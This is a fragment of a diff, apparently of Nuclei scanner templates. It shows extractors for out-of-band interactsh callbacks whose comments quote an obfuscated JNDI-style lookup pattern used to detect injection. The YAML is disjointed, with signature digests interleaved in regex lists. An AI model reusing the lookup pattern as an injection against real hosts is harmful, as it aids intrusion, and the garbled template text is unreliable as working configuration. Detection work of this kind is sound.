||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402203de29e9803f4ef5d0af4870eac8a7559cb0124cdcce62acecbc5d0f83cbc331402203de349240afecbda2e739f4191a4a5a6da4cf41935d45144331269006cfd2baf:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -46,5 +46,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402207920ddfc8c0eb3d1df6bd2272ec73cd6463d4a06f8961a56a0cd9ed1de8aeb3e02202d3bc3a237cad422f7980e7374968252d9dc1f23aa56625989791f6d2bc50608:922c64590222798bb761d5b6d8e72950
|
||||
part: interactsh_request
|
|
@ -47,20 +47,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100aa7ea5068d17343a5be70930a9bb13dcb42a1e6ba099de3e3e69e3944aa40cf002204c515e1344683fe8623e77e52f70cf37eb4136152fc0cf05b832501e897d315f:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
Loading…
Reference in New Issue